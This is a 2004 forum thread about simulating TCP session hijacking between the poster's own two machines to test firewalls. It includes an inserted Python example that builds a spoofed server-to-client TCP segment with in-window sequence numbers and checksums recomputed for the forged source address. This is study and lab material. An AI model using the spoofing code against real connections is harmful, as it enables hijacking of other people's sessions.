August 31st, 2004, 10:29 AM
I am facing the following problem...
This is the situation.
I am using a packet generator from my Linux box in order to attack my windows box.
It seems that when the packet generator sends packets with my real IP they reach my Windows XP box, and the sniffer software logs them and I can analyse them.
It seems, though, that when I send forged packets they do not reach my Windows XP box.
Assumption 1) My guess is that my ISP (Pipex UK) does not allow forged packets.
Assumption 2) I can use a proxy server in order to try and attack my Windows XP box.
How would that take place?
In the information I have read so far there is no explanation, or an inadequate one, of how to make a program other than a web browser connect to a proxy, and things are even worse when it comes to Linux programs.
How will I establish communication with my proxy using my real IP, since my ISP will not allow otherwise, and then ask/command it to send the forged packets? Could tunnelling be the answer? There must be a simpler way...
Assumption 3) Also, since a proxy will connect to my Windows box with its own IP, I think I am in need of a transparent proxy.
Is it possible that there is a much simpler way and I am overcomplicating things? (Setting up a network between the two boxes is not an option since it will give wrong results for my experiments.) By the way, I am trying to simulate a non-blind/blind TCP hijacking attack.
P.S. Does this post belong here?
August 31st, 2004, 10:46 AM
So how does that work then? You have 2 computers plugged into one phone line? Won't they both have the same IP? Might be me being dumb, I dunno...
Does the checksum check out? Why will setting up a network give you the wrong results? It would make it a lot simpler, and also, by saying what you've said, it makes it sound like you're up to something else, but I'm not gonna judge what you're up to.
What port are your packets being forged on, and what's the intention of forging packets? To make them appear to come from someone else?
Give us some more info, specifics - what you're trying to do, type of attack, port, protocol...
August 31st, 2004, 04:32 PM
True, it needs clarification what I am doing. I am afraid, though, that someone at my uni advised that it couldn't be done the way I have it in my mind, but I will still try, just in case someone here has a different opinion and maybe a bit more skill than the person who advised me.
Here it goes.
My objective is to test a number of commercial firewalls on how vulnerable they are to attacks. The objective is not only how the firewall will behave when you have adjusted it, but also how it will behave with out-of-the-box configurations. This last one basically means that I am not able to put them on a network, since firewalls have what is called a trusted zone (when on a network) and this has less security in out-of-the-box configurations.
I have one phone line with a microfilter, which basically allows me to have both a phone and ADSL connection.
Box A: Attacker ----- is running Linux, is connected via an ADSL modem with Pipex as ISP (I am in the UK), and I am running a packet generator named IP Sorcery.
Box B: Target ----- is running Windows XP and is connected via a 56K modem; I also have sniffer software running on it named NGSniff. I would run Ethereal but I could not make it work with the PPP protocol, but that is another story.
The experiment goes like this: I connect Box B to Google. I analyse with the sniffer the packets I am getting, especially the sequence and acknowledgement numbers of the TCP packets.
I am trying, with Box A, to forge packets that seem to have come from Google (I put as source address the Google address from the logs in the sniffer on the first box); in addition I put sequence and acknowledgement numbers that would look like they came from the connection that Box B has with Google.
Essentially I am trying to pass packets to port 80 of Box B (I am not sure, though, if Box B accepts packets on port 80 or another port, but from the analyser it seems that I pass packets to port 80 of Google, while Google connects to Box B on another port, 1280, 1253 or something; I have tried those ports as well). I don't know about the checksum, I haven't wondered about it until now. I think that the generator automatically takes care of that field.
Here the experiment fails since my ISP does not allow the sending of forged packets.
If it went through and I managed to pass myself off as Google, I would install a firewall and try again to see if it would work.
Now, given the way TCP/IP stacks and random number generation work in current OSs, it is almost impossible to perform a blind hijacking attack. But since theoretically this attack can be done, my test would prove that firewalls are bypassed if this attack occurs.
This is where my idea of proxies came in, but it does not seem viable.
P.S. Do I still sound dodgy?
Thanks i2c, hope you'll give your opinion on the subject.
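As an added example (not code from the original thread, and not IP Sorcery's or NGSniff's own code), the following Python shows what a packet generator has to get right when it forges the server-to-client segment described above for a connection whose addresses, ports and sequence numbers were read from a sniffer: the next in-window seq/ack values, and both checksums recomputed over the spoofed source address, which is the checksum question raised in the first reply. The addresses, ports, sequence numbers and payload are constructed for illustration, the function names are assumptions, and nothing is put on the wire; the packet is built and decoded in memory only.

```python
"""Forging an in-window TCP segment from a sniffed connection (stdlib only, offline).

Builds the IPv4 + TCP bytes a packet generator would emit when impersonating the
server side of a connection whose addresses, ports and sequence numbers were read
from a sniffer, and recomputes both checksums so the target stack will not drop
the segment on arrival. Example code; all values are constructed, nothing is sent.
"""
import socket
import struct

TCP_PROTO = 6
FLAG_ACK, FLAG_PSH = 0x10, 0x08


def ones_complement_sum(data: bytes) -> int:
    """Sum 16-bit big-endian words with end-around carry; an odd trailing byte is zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum: one's complement of the one's complement sum."""
    return (~ones_complement_sum(data)) & 0xFFFF


def next_server_numbers(last_client_seq, last_client_len, last_server_seq, last_server_len):
    """Seq/ack a spoofed server segment must carry to land in the client's window.

    Derived from the last data segment seen in each direction. SYN and FIN each
    consume one extra sequence number; this example assumes plain data segments.
    """
    seq = (last_server_seq + last_server_len) & 0xFFFFFFFF
    ack = (last_client_seq + last_client_len) & 0xFFFFFFFF
    return seq, ack


def build_spoofed_segment(src_ip, dst_ip, sport, dport, seq, ack, payload, ttl=64):
    """IPv4 header + TCP header (PSH|ACK, no options) + payload, with both checksums filled in."""
    tcp_len = 20 + len(payload)
    # TCP header with the checksum field zeroed, then fixed up over the pseudo-header
    # (src, dst, zero, protocol, TCP length), which is why the spoofed source address
    # must be known before the checksum is computed.
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4,
                      FLAG_PSH | FLAG_ACK, 65535, 0, 0) + payload
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, TCP_PROTO, tcp_len))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    # IPv4 header: version/IHL, TOS, total length, id (arbitrary), DF flag, TTL, proto, checksum.
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, 0x1234, 0x4000, ttl,
                     TCP_PROTO, 0, socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def parse_segment(packet: bytes) -> dict:
    """Decode the fields a sniffer on the target would show for this packet."""
    ihl = (packet[0] & 0x0F) * 4
    ip_len = struct.unpack("!H", packet[2:4])[0]
    tcp = packet[ihl:ip_len]
    sport, dport, seq, ack, off, flags = struct.unpack("!HHIIBB", tcp[:14])
    return {
        "src": socket.inet_ntoa(packet[12:16]), "dst": socket.inet_ntoa(packet[16:20]),
        "sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags,
        "payload": tcp[(off >> 4) * 4:],
    }


def checksums_valid(packet: bytes) -> bool:
    """What the receiving stack checks: each checksummed region sums to all ones."""
    ihl = (packet[0] & 0x0F) * 4
    ip_len = struct.unpack("!H", packet[2:4])[0]
    tcp = packet[ihl:ip_len]
    pseudo = packet[12:20] + struct.pack("!BBH", 0, TCP_PROTO, len(tcp))
    return (ones_complement_sum(packet[:ihl]) == 0xFFFF
            and ones_complement_sum(pseudo + tcp) == 0xFFFF)


if __name__ == "__main__":
    # Constructed sniffer observations: client (the "Box B" role) on an ephemeral
    # port talking to a web server on port 80. Documentation addresses, not real hosts.
    client_ip, client_port = "192.0.2.10", 1280
    server_ip, server_port = "198.51.100.80", 80
    seq, ack = next_server_numbers(last_client_seq=0x1000, last_client_len=300,
                                   last_server_seq=0x2000, last_server_len=1000)
    pkt = build_spoofed_segment(server_ip, client_ip, server_port, client_port,
                                seq, ack, b"hello")
    print(parse_segment(pkt))
    print("checksums valid:", checksums_valid(pkt))
```

The checksum is computed over a pseudo-header that contains the forged source address, so a generator that lets you edit the source IP after filling in the checksum, or that copies the checksum from a sniffed packet, produces a segment the target stack silently discards; `checksums_valid` is the test to run on the generator's output before blaming the network. None of this addresses the blocker described above, an ISP that drops packets leaving its network with a source address that is not one of its own.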
August 31st, 2004, 04:41 PM
-- Make sure a firewall isn't running so that no interruption occurs and packets move between machines freely.
-- Same in the event you have a router or anything like a router (hardware firewall, etc). I didn't fully read your post to see if you have a router, but if you do you might want to disconnect for this experiment. This is for best results.
-- Make sure system resources on both machines can handle the amount of packets you're going to send, the type of packets, size, etc.
-- Notify your ISP and alert them that you are doing an experiment on both machines (provide them with the systems IP address so they know which are being used) so when they detect/see suspicious activity, they won't freak out.
-- In order for packets from Box A to go to Box B's port 80, the port needs to be opened. This means a webserver of sorts needs to be running.
-- As far as I know, that whole "Google connecting/connection" hijack type thing doesn't always work to the full extent. You sometimes get your own IP traced back to you. Perform a ping to your other box once connected and see which IP you get, yours or Google's.
Hope I helped ya out a little bit..